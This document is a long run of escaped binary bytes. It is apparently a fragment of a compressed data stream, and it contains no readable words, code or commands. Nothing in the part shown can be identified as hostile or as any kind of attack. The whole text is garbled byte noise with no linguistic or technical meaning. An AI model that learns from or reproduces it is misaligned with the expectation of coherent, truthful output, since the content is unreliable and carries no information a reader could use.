\x12\xcd\xe3w?\xda6\xdd?}\xef\xa3\x00\x17\xeb\x7f\x06hq\xc4\xc8\xc0\xf8\xfe\xeb\xef`S\xf1*?EH\x80\x90\x17\x07\x00\x00\x00\x00\xff\xff\x22'\x02\xfe\xffg``\xf8\xcf\xc8\xc8\xd8\xb7\xe3\xe1\xb2c\xcf\x05\xb8Y\xff\xff\xff\xff\xff?\x03\x13#\xc3\xbf\xff\x0c_~\xfc\xf57\x16-\xf2\x90\xe7dcF*%a%\xfa\xbfO\x0c\x9ff0|hg\xf8\xfb\x81\x81\x91\x81\x81\x89\x05Z8\x0c\x0c\x80\x14t\x7f\x18\xfe100q2\x08\x142\xf0\x1500\x8b\xc2\x1c\xcc\xc4\x00\xab\xe1\xfe\xfe\xfb?m\xef\xe3\xa5\xc7\x9es\xb02\xb30Akff&\xc6\xf7_\x7f{\xe9\x8b\xd6\x06(\xb123\x92\x17\x07\x00\x00\x00\x00\xff\xff\x229\x02\xe0\xcd\xcd\xd6M\xf7\xd6\x9cz%\xc2\xcb\xfa\x17\x961\x7f\xfe\xf9\xf7\xf7\xdf\xff|7\xf90sq\x06\x94\x84\xff\x07Z\xdc\x7f\x9a\xc2\xf0\xb1\x8f\xe1\xd7}Xi\xf3\x97^I\x1e?`d`d\x86F\x03\x8b\x04\x03\x7f.\x83@\x19\x03\x03\x0b\xbcD\x82\x172;/\xbf\xed\xd8r\xff\xf7\x9f\x7f\x90\xb4\xc5\xc0\xc0\xc0\xc2\xcc\xf8\xe6\xf3o'-\xa1\xf60U\xf2\xe2\x00\x00\x00\x00\xff\xff\x22-\x02\xe0\xe5~\xeb\xc6{\xeb\xce\xbc\x12\xe6e\xfd\xf3\x17\x1a\xfa_~\xfe\x15\xe1am\x0cR6R\xe0C\xaalaM\xc2\xdf\xd7\x19\xde\x962|\xd9\xca\xc0\xc4\xc0\xc0\xc4\xcc\xf0\x9fn\xa5\x0d\xf1\x80\x91\x81\x91\x09Z(q\xd90\x08\xf71\xb0\x9b200@\xb2\x02\xdc\xe3\xb7^|\xab]s\xe7\xc1\x9b\xef\xfc\x9c\xd0*\x81\x85\x99\xf1\xdd\x97\xdf\x0e\x9aBm\xa1*\xac\xccL\x0c$\xd6\x07\x00\x00\x00\x00\xff\xff\x22!\x02\xfe30\xfc\xff\xff\x9f\x89\x91\xb1s\xcb\xfd\x95'_\x8a\xf0\xb0\xfe\x81U\xb9\x1f\xbf\xffQ\x93\xe0j\x0fS\x95\x11\xe2@*v %\xfe\x7f\x86\xf7-\x0c\x1fZ\x19\xfe\xfdd`b\x81\xb5\x7f\x06-`d`df\xf8\xf7\x87\x81\x81\x91\x81\xbf\x80A\xa8\x9d\x81\x91\x1d\x9e\x83!^{\xff\xf5w\xf5\x9a;g\xee}\x12\xe0B\x89\x03gm\xe1\xcep\xd5\xff\xff\x190:\x98\xf8\x00\x00\x00\x00\xff\xff\x22!\x02 \xd6O\xdb\xfbx\xde\xc1\xa7\x82\xdc\x88\x92\xe7\xe3\xb7?zr<}Q\xea|\x9c,H\xa1\xff\x87\x81\x81\x85\xe1\xdf[\x86W\xf1\x0c_\xb620300030\xfc%18\x06\x0a01000\xfc\xfd\xc7\xc0e\xc9 \xb6\x82\x81E\x0e\xde|\x804\xbb\x7f\xfd\xf9W\xb9\xea\xf6\xc1\x1b\xef\xe1\xe1\x00\x89\x83@c\xb1j\x7f%\x92\xda\xa6\x00\x00\x00\x00\xff\xffb\x22\xac\x84\x01\xe2\x98\xff\xccL\x8cK\x8e>\x9fs\x00\x11\xfa\x90\xb4o\xa3&0)V\x83\x8f\x93\x05\xdetc\xf8\xff\x87\x81\x81\x85\xe1\xfb\x1e\x86'f\x0c_\xb720\xb3@\xfa\xf3\xa4\x07\xc4@\x81\x7f\x0c\x0c\xff\x18XX\x18\xbe\x1fgxj\xca\xf0u5\x03\x033\xc3\xff?\x0c\x0c\xff\x99\x98\x18\xff\xfd\xff\xcf\xc6\xc2\xd4\x15\xa1\xe6g$\xfa\xe1\xdbo\x16&F\x06\x06\x86?\x7f\xff\x0bq\xb3\xae9\xfdr\xe2\xceGL\x8c\x8c\xff\xfe\x11\x9b\xac\x01\x00\x00\x00\xff\xff\x22*\x02 \xa1\x7f\xe8\xe6\xfbI\xbb\x1e\x09q\xb3\xfe\x83\x85\xfe\x87o\x7f\x8c\x15\xf8:\xc2U\xb9\xd8\x98aU\xee\x7f\x06\x86\xbf\x0c\x8c,\x0c_\x973<wc\xf8s\x8f\x81\x99\x99\x81\xe1\xcf\xe0+\xf1\x89\x00\xff\xff0013\xfc}\xc5\xf0\x22\x8c\xe1\xd3D\x06FH\x8f\xfd?\x13#\xe3\xff\xff\x0cL\x8c\x8cu\x01\xca.\xda\xc2o\xbf\xfefafd``\xf8\xf3\xef\xbf\x08/\xdb\xa2#\xcf\xd6\x9f}\x05i8\x11c\x09\x00\x00\x00\xff\xff\x22\x1c\x01\xff\xfe3031>~\xf7\xa3u\xe3=.v\xa6\xff\x0c\xff\xff30031~\xfa\xf1G[\x86\xa7#\x5c\x95\x8d\x85\x09)\xf4\xff3003\xbc\xafax\x19\xc5\xc0\xc8\xc0\xc0\xc8\xc4\xf0\x7f\x08%|L\xf0\x97\x81\x91\x89\x81\x89\x99\xe1u\x01\xc3\x9b,X&\xfe\x07)_\xfe\xffgh\x08R\xb6S\x17\xfc\xf0\xf5\x0f$\x1f\xfc\xfb\xf7\x9f\x9f\x8b\xa5\x7f\xfb\xc3\xabO\xbf0\xc3Z\xab\xf8\x01\x00\x00\x00\xff\xff\x22\x10\x01\xff\xff30\xfc\xff\xff\xfb\xef\xff\xa6\xf5w?~\xff\xc3\xca\xcc\x04\x89\xfc\xef\xbf\xfeI\xf2\xb3wE\xa8\xf2s\xb2 \x85\xfe?\x06\x06&\x867)\x0co[\x91\xfaVC\x1d\xfcc`\xf8\xcb\xc0\xc4\xcc\xf0a:\xc3\xcb`\x86\xff\x7f\x19\x18\x18\xe1q\xc0\xce\xc2\xd4\x12\xa2\xa2!\xc5\xfd\xf9\xe7_f&F\xe8\x18\xcc\xff\xff\x8d\xeb\xef~\xfe\xfe\x97\x91\x81\x91`\x14\x00\x00\x00\x00\xff\xff\x22\x10\x01\xff\xfe\xffgbb\x9c\xba\xe7\xd1\xb9\x87\x9f!u,##\xc3\x9f\x7f\xffY\x99\x19;\xc2UEy\xd9 -ND\xda\x7f\x93\xca\xf0a.\x03\x0b+\x1d\xbb\xb5\xf4\x01\x7f\x19XX\x19\xbelbx\x05\x8f\x83\xff\x8c\x8c\x0c\xff\xfe\xff\xe7fg\xee\x0cW\x15\xe2f\xf9\xf9\xfb\x1f\x13D\x84\x8d\xf9\xfe\xeb\xef]\xdb\xeeC\x14\xe07\x17\x00\x00\x00\xff\xff\xc2\x17\x01\x90J\xf5\xe4\xdd\x8f+\x8e\xbf\x10\xe4\x826\xf9\x19\x19\x19\xbf\xfd\xfc[\xe6\xad\xa0.\xc9\x0dk\xf3\xfcg\xf8\xff\x17\x9a\xf6?\xcea`ae\xf8\xff{x\x85>\x03\x03\x03\x03\xc3\xff\xdf\x0c\xcc\xf08\xf8\x03Ia\x901GI\x01\xf6\xda\x00e\xc8($#\x03\xc3\x9f\x7f\xff\x05\xb8X\xb7_|\xb3\xed\xe2\x1b\x82\x95\x01\x00\x00\x00\xff\xff\xc2\x19\x01\xff\xff3020\xbe\xfb\xfa\xbbm\xd3=6\x16&H\x80\xb201~\xf8\xfa;\xdeV\xcaS_\x04\xa5\xbd\xcf\xc8\xc2\xf06\x97\xe1\xc3\x5c\x06fH\xe8\x0fS\x00\x89\x83\xcf\x9b\x18^G\xc1Z\xd5\xd0\x81\x0a\x0be\xfe<7\xb9\x8f\xdf\xfe@\xe6E\xfe\xfd\xff\xcf\xcb\xc1\xd2\xb7\xfd\xc1\xa3\xb7?\x98\x99\x18\xf1D\x01\x00\x00\x00\xff\xff\xc2\x19\x01\xff\xfe\xffgdd\x98\xb8\xf3\xd1\xb3\x0f?9X\x99 U\xf1\xa7\xef\x7f\xcc\x94\xf83\x9cd\xfe\xc2f`\xa0\xed\xfd/\x0b\x19>L\x19\xe6\xa1\x0f\x01\xff\x7f3\xb0\xb02|Z\xc3\xf0\xb1\x136\x5c\xc1\x00\x89\x83p\x0b\x09\x0f=\x91\x0f\xdf\xfe031\xfe\xff\xcf\xc0\xc2\xcc\xf8\xe5\xc7\xdf\xee\xad\x0f\xfeAF\xcap\x00\x00\x00\x00\x00\xff\xff\xc2\x1e\x01\x90\xd4}\xf0\xc6\xfbm\x17_\x0bp\xb1\xfe\xf9\xf7\x9f\x91\x91\xe1\xd7\x9f\x7f\x82<\xac\xb5\x01J\xccL\x8c\xb0\x19\x95\xbf\x0c\x0c,\x0c\xdf62\xbcJb`ba`\xf8C\x1bO\x0f2\xf0\xff7\x033\x0b\xc3\x9b\x0a\x86\xcf3\x19\x18X\x18\xfe\xffa``\x80\xb4M\xcb\xbc\x15\x14D8~\xfc\xfa\xcb\xc4\xc8\xf0\xf7\xdf\x7f>N\x96cw>l\xc0\xdb*\x05\x00\x00\x00\xff\xff\xc2\x12\x01\xff\x19\x18\x18\x19\x19\xbe\xff\xfa;}\xefc\x0eV&H\xecAZ>%^\x0a\x92\x02\xec\xb0\x8a\xf7\x1f\x03\x033\xc3\x9f\xc7\x0c\xaf\xe2aM\xa0aW\xee\xe3\x04\x7f\x19\x98\x98\x18\xde\xe40\xfc\xba\xc0\xc0\xc8\xc2\xc0\xf0\x97\x91\x91\xe1?\xc3\x7f>N\x96j?%xP\xff\xfd\xff\x9f\x87\x9dy\xee\xc1go\xbf\xfc\x86\xc4\x10&\x00\x00\x00\x00\xff\xff\xc2\x16\x01\xff\xfe312.8\xfc\xec\xce\xcbo\x9c\xac\xcc\xf0\xc2\xc7^S\xd0YK\x08Q\xf12\xfcg\xf8\xff\x8b\xe1u4\xc3\xdf\x8f\x0c\x8cL\xc3\xa2\xc5I<\xf8\xcf\xc0\xc0\xc8\xf0\xff\x0f\xc3\xabh\x86\x7f\x1f \x8d\x22H\x85l \xcf\xebg$\xfa\xf1;\xb4 bcaz\xf5\xe9\xe7\xb4\xbd\x8f\x19\x19\x19\xb0\x16D\x00\x00\x00\x00\xff\xffB\x8f\x80\x7f\xff\x19\x18\x99\x18\x1f\xbf\xfb\xb1\xfa\xd4K>N\x96?\xff\xfe320\xfc\xfd\xf7\x9f\x83\x95)\xd3I\xf6?b\xa8\xef/\x03\x033\xc3\xbb\x22\x86\xaf\x87\x19\x98Y\x86\xd40\x03\xb5\xc0_\x06&\x16\x86\x9f\xd7\x18\xde$10@\xd3\x1f$\x99'\xdbK\x8b\xf0\xb0\xfd\xfe\xf3\x8f\x91\x91\xe1\xef\xbf\xff\xfc\x9c,\xdb/\xbe\xb9\xfc\xf8\x0b\x13\xb6\xae\x19\x00\x00\x00\xff\xff\xc2\xcc\x01\xff\x19\x19\x18\x16\x1cz\xf6\xf9\xc7_H#\x87\x89\x89\xf1\xd3\xf7?\xd1V\x92Jb\x9c\xff\xa0\x85\xcf_\x06\x06\x16\x86\xef{\x19>Le`\x86\x16\x82#\x11\xfc\xff\xc3\xc0\xcc\xca\xf0y=\xc3\x97\xc5\x90\xc1\x22H\xc3_\x84\x97-\xd5Q\xe6\xcb\xcf\xbf\x90\xe9\x10FF\xc6\x7f\xff\xfe\xcf=\xf8\x94\x81\x81\x01sA\x07\x00\x00\x00\xff\xffB\x89\x80\x7f\xff\x19\x98\x18\x19\x1f\xbd\xfd\xb1\xf7\xda[^\x0e\xe6\xbf\xff\xfe312|\xff\xf5WM\x82+\xceF\x0a\xa9\xc7\xcb\xc0\xf0\xff7\xc3\xbb\x12\x068w\xc4\x82\xff\x7f\x19\x18\x99\x18\xde\xd50\xfc\x83\x94\xc3\xff!#\x10\x01\xc6bfJ\xfc_~\xfc\x85\x94K<\x1c,'\xef}\xb8\xf0\xe83\x13#\x03\xda8\x1d\x00\x00\x00\xff\xffB\xcb\x01\xff\x19\x18\x18V\x9cx\xf1\xed'4\xf9322\xfe\xfe\xfb?\xd3Y\x96\x83\x95\x096\xdd\xf3\x8f\x81\x81\x99\xe1}-\xc3\x8f\x0b\x0c\x8cL#\xb2\xf0A\x06\xff\x18\x18\x19\x19~?bx\x9b\x03/\x88\x18\x18\x18\x98\x18\x19\xb2]e\x99\x99\x18\xfe3@\x97\x15\xfd\xff\xcf\xb0\xfc\xf8s\x06\x06\xf4<\x00\x00\x00\x00\xff\xffBD\x00$\xf9?~\xf7c\xfb\xc57<\x1c,\x90\xe4\xff\xf5\xe7_Cy^\x1b5A\xd8P\xf3?\x06\x06&\x86\xdf\xf7\x18>\xf6101\x8f\xb0\x8a\x17\x17\xf8\xcb\xc0\xc4\xcc\xf0y\x09\xc3\xcf\x93\x90\xde\x19\x13#\xe3\xbf\xff\xff\xb5\xa5y\xec\xd4\x05\xbf\xfc\xf8\x0bi\x83\xf2\xb03\x1f\xba\xf1\xe1\xf2\xe3/\x10Y\xb8f\x00\x00\x00\x00\xff\xffBZ\xa1\xf7\xff?\x03\x03\xc3\x8eKo>\xff\xf8\x83\x94\xfc\xff\x85\x98\x8aC\x22\x10\xa2\x88\x81\x81\x91\xe1c+\xc3\xbf\xdf\xa3\xe5\x0f\x0a\xf8\xcf\xc0\xf0\xbe\x01\x85\xcb\xc0\x10j.\xc1\xc4\xc4\x08\x9bEg\xfc\xf3\xef\xff\x96\x0b\xaf\xe1\xb2\x10\x00\x00\x00\x00\xff\xffBD\x003\x13\xe3\x8f\xdf\xffv_y\xc7\xc9\xc6\x0c\xe9\x06\x7f\xff\xf5WE\x9c\xcbVC\xf0\xff\x7f\x06f&F\xe8\xd8\xec\xcf\x93\x0c\x9f\x17201\x8d\xdc\xba\x17\x0b\xf8\xcb\xc0\xc4\xcc\xf0m\x07\xc3\xb7M\xd0L\xc0\xc4\xf8\xff?\x83\x81\x1c\xaf\x81\x1c\xef\xd7_\xd0\x9a\x80\x9b\x9d\xe9\xf0\xcd\xf7o\xbf\xfc\x86\xc7\x0a\x03\x03\x03\x00\x00\x00\xff\xff\x82F\x00\xa4\x9fv\xe8\xc6\xfb\xfb\xaf\xbfA\x8a{&F\xc6\x1f\xbf\xff\x85\x99I\xb0\xb30!e\x19F\x86\xf7\x0d\x0c\xff\xfe\x22/n\x1d\x05P\xf0\x9f\x81\xe1}\x1d\x03\x03\x03|\xa1###C\x94\xa5\xc4\xbf\x7f\xff!mwVf\xa6W\x9f~\xed\xb8\xf4\x06\x22\x0b\xd1\x04\x00\x00\x00\xff\xff\x82\x86#d\x5cg\xcb\x85\xd7\x90Am\xc8\xc0\x83\x9c0\x87\x9b\xae\xf0\x7f\x06\x06&H\xf2g`b\xf8u\x99\xe1\xfb^\x06&\xa6\x912\xea@\x02\xf8\xcb\xc0\xc4\xcc\xf0\xf3\x22\xc3\xf7=\x0c\x0cL\xd0L\xc0\xc0`\xa9\x22\xa0)\xc5\xfd\xfd\xd7_\xc8H5;+\xd3\xce\xcbo\xfe\xfc\x85\x8f\xa41\x00\x00\x00\x00\xff\xffbb\x80\xae\x96e|\xf0\xe6\xfb\xa5G\x9f\xb9\xd8\x98!\x8d\xfd\xaf?\xff\xba\xea\x08s\xb33\xff\xfb\xf7\x1fVo32|lc\xf8\xf7{4\xf9\xe3\x04\xff\x19\x18>\xb4000@:\xac\xff\xfe\xfdgaf\xf46\x10\xfd\xf1\xfb\x1f##\xe3\xff\xff\x0c\x9c\xac\xcc\xb7_|\xbf\xf4\xf8\x0b#,\x13\x00\x00\x00\x00\xff\xffbb\x80U\xbf\x87o~\xf8\x02k}\xfe\xfb\xf7\x9f\x8b\x8d\xd9E[\x98\x81\x01\xb2\xa2\xf3\x1f\x03\x033\xc3\xdf'\x0c_710\x0d\xad\xe9uz\x82\xbf\x0cLL\x0c\xdf\x0f3\xfc\xba\x00\xcd\x04\x8c\x8c\x0c\x0c\x0c\xf6\x1a\x82\xc2<\xac\x7f\xfe\xfeg\x84.s\xffw\xf0\xc6;\x06\xd8\x127\x00\x00\x00\x00\xff\xffbb``\x80\xcc\xe2\x1f\xb8\xfe\x8e\x9d\x85\x09\xb2\xf2\xe7\xdb\xaf\x7f\x86\x0a|\xaa\x12\x5c\xd0\x9d\x08\xff\xff1000|\x9a\xca\xf0\xf7\x1b\x03#\xf3h\xe3\x07'`db\xf8\xff\x8f\xe1c\x1f\x03\x03\x03\xc3\x7f\x06H\xc7X\x8c\x8f\xcdZU\xf0\xeb\xcf\xbf\x90\xa1\x08\x0e6\xe6\xa3\xb7?|\xfb\x05\x9d\xc2\x04\x00\x00\x00\xff\xffb\x82\xd4\x15w_\x7f\xbf\xfd\xf2\x1b\x07\x1b\x13d\xf1\xfe\xef\xbf\xff\x1c4\x04\x19\xa0\x99\xe3?\x03#3\xc3\xff\x1f\x0c_\x963\xc0#c\x14`\x05\xff\xff2010|\xdb\xc8\xf0\xf7\x0d$\xa5B\x92\xb9\xa3\x96 ##de\x1b\x03;+\xd3\x93w?.?\xfe\xc2\xc0\xc0\xf0\xef\xdf\x7f\x00\x00\x00\x00\xff\xffb\x82\xa88u\xf7\xe37\xd8\xd8\xc5\x9f\xbf\xff\x05\xb9Y-T\xf9\x19\xa0\xfb[\xfe1002\xfc\xd8\xc7\xf0\xfb!\x03\xe3h\xe7\x0b?\xf8\xcf\xc0\xc8\xc2\xf0\xe7\x13\xc3\xb7\x0d\x0c\x0c\x0c\xf0R\xc8P\x81OR\x80\x1d2<\xc7\xc8\xc0\xf0\xf7\xef\xff\x13w>@4\x00\x00\x00\x00\xff\xffb\x82\xa88y\xf7#dm)\x13#\xe3\xf7\xdf\x7fuey$\xf9\xd9Q\x96\x9a~^\xcc\xf0\x9f\x11s,i\x14\xa0\x03H_\xf5\xcb\x12\x06\x06\x06H\x02\xfe\xf7\xef?\x0f;\xb3\xa9\x12\xdf\xf7_\x7f\x99\x18\x19\xff\xff\xff\xcf\xce\xcat\xe6\xfe'H[\x08\x00\x00\x00\xff\xff\xec\x981\x12@0\x00\x04\xef\x12\x932_\xe0\x0b\xfc\xbf\xd2\xfa\x83J\x81BA!B\x9c\x22\x1e\xe0\x01\xf6\x0d7\xb3skHl\xe1\xea\xe7\xdd\x15F\x10\x893\xa9.=^M\x0b\xb0P\xc0\xd1\x82\xfa\xe7\xff\x81\x1b\x14b\x874\xe5:\x94\x85\xd9T^\xca\xff\x00\xce\x9aa9\xc65\x12x\x00\x00\x00\xff\xffbb``\xb8\xf1\xfc\xdb\xdb/\xbf!k~\xfe\xff\xff\xcf\xc9\xca\xa4'\xcb\xc3\xc0\x00\x1fzc`\xf8y\x8c\xe1\xf7\xb3\x917\xebB\x1e\xf8\xcf\xc0\xc4\xcc\xf0\xe7\x1b\xc3\xf7=\x0c\x0c\x0c\x0c\xff\xffA\x96\x89jKs\xf3qB\x17\xb5333~\xf9\xf9\xf7\xea\x93/\x0c\x0c\x0c\x00\x00\x00\x00\xff\xffbb``\xb8\xf4\xe8\xf3\xaf\xbf\xff\x18\x19!\xfd\xaf\xff\x12\xfc\xec\x90\x9d-\x8c\xf01\xa0\xef\x07\x18\xfe300\x8e6\xff\x89\x04\x8c\x0c\x0c\x0c\x0c?\xf6A\x98\x90.\x97\xac\x10\xa7\x82('d\xed\x10\x03\x03\xc3\xff\xff\xff/>\xfa\xcc\xc0\xc0\x00\x00\x00\x00\xff\xffbb``x\xf8\xe6;3#\xa4\x03\xcc\xf8\xeb\xcf?E1N\x0eV&\xc8~#h\xa0\xff<\x06\xd14\x00~\x19\x8a\xe0\xff?\x06F\x06\x86\x1f'\xe1\xbb\xe1 \x0b\xdaT%\xb8~\xfd\x85\xf4\xc8\xfe\xb323=z\xfb\x83\x81\x81\x01\x00\x00\x00\xff\xffb\xfa\xf3\xf7\xff\x837?X\x99\x19\xff\xff\xff\x0fYT\xa4*\xce\xc5\x00\xdb\x87\xc4\xc0\xc0\xc4\xf0\xef3\xc3\xaf\x8b\x0c\xf0\xe2h\x14\x10\x06\xff\x19\x18\x19\x18\xfe\xdca\xf8\xf3\x18\xb2\x8e\x11\x22\xaa&\xc1\x0d\x1fSfef|\xfa\xee\xc7\xa7\xef\x7f\x00\x00\x00\x00\xff\xffbz\xfe\xf1\xe7\xab\x8f\xbfXY\x18\xff\xffg\xf8\xff\x9f\x81\x85\x89QS\x8a\x1bf\xd0?\x06\x06\x06\x86_\x17\x19\xfe\xbc\x81L\xf7\x0c\x80_\x86$\xf8\xcf\xc0\xc0\xcc\xf0\xf7'\xc3\xcf\xd3\x0c\x0c\x0c\x0c\xff\xa1\x83q\xea\x92\x5c\x9c\xacL\xff\xfe\xfd\xff\xcf\xc0\xc0\xc2\xcc\xf8\xfe\xeb\x9f\x07o\xbe\x03\x00\x00\x00\xff\xffbz\xfa\xee\x07b\x04\xe2\xff\x7f\x0e6f\x19!\x0e\x06H\x0d\x0c)s~_e\x80\x0dZ\x8c\x02b\x01$\xc8\x7f]d````\xf8\x0fYE%)\xc0\xce\xcb\xc1\xf2\xf7\x1f\x03#\x03\x03\x13#\xe3\xcf?\xff\x1e\xbe\xf9\x01\x00\x00\x00\xff\xffbz\xf1\xf1\xd7\xdf\x7f\xd0\xfd\x98\x7f\xff\xfd\xe7\xe7d\x16\xe1ec\x80\x0e\x0110000\xfc\xba\xcc\xc00\xda\x01 \x11@\xd2\xee\xaf\xab\x0c\x0c\x0c\x0c\xb0\xed2\xfc\x9c,\xc2<\xac\x7f\xfe\xc1W\xb7\xff\x7f\xf1\xe1'\x00\x00\x00\xff\xffb\xba\xff\xfa;t\xde\x92\x81\xe1\xf7\xdf\xff\xe2\xfc\xec\xbc\x1c\xcc\x90E\xa6\xd0\x1a\xf8\xd75\x84\x89\xa3\x80X\xf0\x9f\x81\x91\x81\xe1\xf7MX=\xfc\x1f\xb2\xbcJJ\x90\xe3\xf7\xdf\xff\xd0uDL\x8c\xf7^\x7f\x07\x00\x00\x00\xff\xffbz\xf9\xf1'l\xad\x03\xe3\xdf\x7f\xff\x05\xb8X\x18\x90k\xe0\xff\xff\x18\xfe>c@\xecw\x1c\x05D\x82\xff\x0c\x0c\x0c\x0c\xff^1\xfc\xfb\x02\xe5\xff\xff\xcf\xc0\xc0 \xcc\xc3\x0a\x19m\xfb\xcf\xc0\xc0\xc4\xc8\xf0\xfa\xf3/\x00\x00\x00\x00\xff\xffbz\xf7\xf5\x0f\x13#t9\xe2\xbf\xff\x0c\x90\xf2\x07\xb1\x86\xeb\xffg\x86\xbfo\x10&\x8e\x02\xe2\x01#\x03\xc3\xdf\x0f\x0c\xff\xde200\xc0CO\x84\x97\x0d\x1a\xb6\xff\x19\x98\x98\x18?|\xfd\x03\x00\x00\x00\xff\xffb\xfa\xf0\xf57\x13$F\x18\x18\xfe\xff\xff\x0f\x89\x00\x84\x9e\xbfo\x18\xfe}\x18\xad\x00H\x07\x90\xf2\xe3\x0f\xc3\x9f\xe70.\x03\x03\x03\x83\x08/+\xb4\x02```fd\xfc\xf4\xe3\x0f\x00\x00\x00\xff\xffb\xfa\xfd\xf7?\xf2\x8eJ>Nf$#\x18\x18\xfe\xbe\x80n\xbe\x18\xcd\x01$\x03F\x86\xff\x0c\x0c\x7f\x9f100\xc0C\x8f\x8f\x83\x05vz\x00d\xd8\xff?\x00\x00\x00\xff\xffb\xfa\xf5\xe7\x1f<\x02\x18\x19\x18X\x99\xd1R\xfb\xe8\xdc/\x85\x00%\x00Y\x98Q6\x10320\x00\x00\x00\x00\xff\xffb\xfa\xf6\xeb\x1f\x13##$\x82\x98\x98\x18\x058\xe1\xc7YAr\xc0kX\x13i\x14\x90\x08 !\xfd\xe7\x15\x03\x03tv\x8c\x81\x81A\x80\x93\x05m\xf7$\x00\x00\x00\xff\xffbbD\x0d[\x8c\x82ft\xf8\x81B\x80\x12\x80\x98\xe58\x00\x00\x00\xff\xff\x1a\xed\xdf\x0e0\x00\x00\x00\x00\xff\xffB\x8f\x00\x8c\xb2f4\x07P\x08P\x02\x10\xb3(\x07\x00\x00\x00\xff\xffB\x8f\x80?h[\x99\x18\xb9\xa8\xee\xa2\x91\x05\x18\xb9\x91y\x7f0vh\x00\x00\x00\x00\xff\xffb\xe2\xe5`\xf9\x0b[z\xf5\xf7\xdf\xff\x0f\xdf\xe0\xdb\x1c\x19\x19\x18\x18\x18\x98\x04G\xbb\xc1d\x02HP3\x0b2000\xc0f\xb6>~\xfb\xf3\xf7\xef\x7f\xe4\x8a\x17\x00\x00\x00\xff\xff\x82/\x91\x83\x82\xbfh1\xc4\xc8\x011\x8c\x96.\x1d\xd6\x00\x1a\x80P\x80\x16\xbc\xff\x19\x18\x00\x00\x00\x00\xff\xffb\xe2bg\xfe\xf7\xff?\xbcpz\xfb\x05\xdeneb````\x96b`\xe2\x80\xce\xf4\x8f\x02\x12\x00#\x03\xc3?\x06&\x06\xd8y\x8c\xd0\xa2\xfe\xed\xd7\xdf\x90ia\xc8\xd2D.V&\x00\x00\x00\x00\xff\xffb\x12\xe4f\xf9\x07\xab'\x98\x18\x19\xdf|\xfe\x85b\x0e\x93\x10\x03\x93 \xcc\xc4Q@\x0a\xf8\xff\x9f\x81\x91\x83\x81\x09r\x04 4\xf4\xde|Bld\xff\xfb\xef?\x1f\x17\x0b\x00\x00\x00\xff\xffb\x12\xe2f\x85\x1ch\xf8\xff?\x03\x13\x13\xc3\xbb/\xbf\x19\xa0\x93\x01\x8c\x0c\x0c\xff\x19\x988\x18\x98\xc5F\xfbb\xa4\x03H\x0d*\xc4\xc0$\x84,\xfa\xf6\xcb/h\x05\xc0\xc8\xf0\xef?\x83 7+\x00\x00\x00\xff\xffb\x92\x11\xe2\xf8\xff\x0f:B\xcd\xcc\xc4\xf8\xf6\xcb\xef\x7f\xff\xff\xc3*\x86\x7f\x0c\x0c\x8c\xb0L4\x0aH\x02\x8c\x0c\xff\x19\x18X\xa4\x19\x988\xa1[\xdf\x19\x19\x19\x18\x18^\x7f\xfe\xc5\xc4\x04=\x87\xe3\xdf\xbf\xffR\x02\xec\x00\x00\x00\x00\xff\xffb\x92\x17\xe1\x84\xc4\xc9\xff\xff\x0c\xacLL\xaf?\xfdz\xf7\xe5\x0f\x03\xec\xa4 \x06\x06\x06\x066=\x06\x06\x0a\x8e\x86\x1d\x99\x00\xba%C\x9b\x81\x81\x81\xe1\xff_\xc8\xe8\xff\xcf?\xff\x9e\xbd\xff\xc9\xca\xcc\x04\x99\x01\xfb\xff\x9fAA\x84\x13\x00\x00\x00\xff\xffb\x12\xe7ceea\xfc\xf7\x1fr\x0e\x16\xc3\x97\x9f\x7f!\xd5\xc0\x7fx\xcb\x87U\x8b\x81a\xb4\x1dD\x16`\xd3\x822\xfe3000\xbc\xff\xf2\xfb\xc3\xb7?,L\xd0\xc1\x7f&&F\x09\x016\x00\x00\x00\x00\xff\xffb\x92\x15\xe6\x84\x9c\xb8\xcd\xc8\xc0\xc0\xc4\xc4\xf8\xe3\xf7\xdf{\xaf\xbf3@\x97821000\xb0\xeb30\x0d\xa1\x03\x0f\x07\x07\x80,\x0db7f```\x80m\x8b|\xf8\xf6\xc7\x97\x1f\x7f \xab\xd2\xff\xfe\xfb\xcf\xc5\xc6\xac(\xca\x09\x00\x00\x00\xff\xffb\x12\xe2a\x95\x12\xe4\xf8\xf5\x071+p\xfd\xd9W\x981\x90|\xa4\xce\xc0\x22\xcf\xf0\xff\xff\xe8\xc2\x08\xa2\x01#\x03\xc3?\x06f\x01\x066C\x06\x06\x06x\xb8\xdd|\xfe\x152\xfb\x02\xd9\x00 \xca\xc7&#\xc8\x01\x00\x00\x00\xff\xffbbd`P\x10\xe5\xf8\x83\xb4b\xeb\xce\xcbo\x0c\xd0}a\xb0S\x09\xd8\x8d\x19\xfe\x8fV\x03\xc4\x03&\x86\x7f\x0c\x0cl\xba\x0cL\x82\x90\x86\x0c$\xe4n\xbe\xf8\x06\xdb\x82\xc7\xf8\xfb\xef\x7fY!vvV&\x00\x00\x00\x00\xff\xffbb``P\x16\xe3\x82\x1e\xd2\xff\x9f\x81\x8d\x85\xf1\xe1\x9b\xef\xef\xbf\xfefD\xae\x879l\x18\x18\x18F[\xa2\xc4\x02\xe8\x81~\x16\x0c\x0c\x90\xe5\x10\x0cL\x8c\x8c\xbf\xfe\xfc\xbb\xf3\xe2\x1b\x1b\x0b\x13|\x05\xa2\xa2('\x03\x03\x03\x00\x00\x00\xff\xffbb``0\x90\xe7\xe5ag\x86\xac\xd8befz\xfb\xe57d\xdd\xe8\xbf\xff\xff\xa1\xd5\x00\xa7\x0b\x03\x13\xcb\x10?\x80\x92\x8e\x00R\x01py00000B\xcf&\xbe\xf9\xfc\xeb\xd3\xf7?\xd8a+\x10Y\x99\x19\x8d\x15\xf9\x19\x18\x18\x00\x00\x00\x00\xff\xffbb``\x90\x13\xe6\x10\xe5c\xfb\x05\x9b\x1c\xfe\xfb\xef\xff\x95\xa7\xc8\xd5\xc0\x7f\x06V-\x066\xb5\xd1j\x808\xc0\xc8\xf0\xff\x1f\x03\x8b\x184\x070@\xf7 ]}\xf6\x15\xb2W\x92\x11v\xaa\x9f\x8a8'\x03\x03\x03\x00\x00\x00\xff\xffb\xfa\xf7\xef?;\x0b\x93\xb64\xcf\xcf?\xff 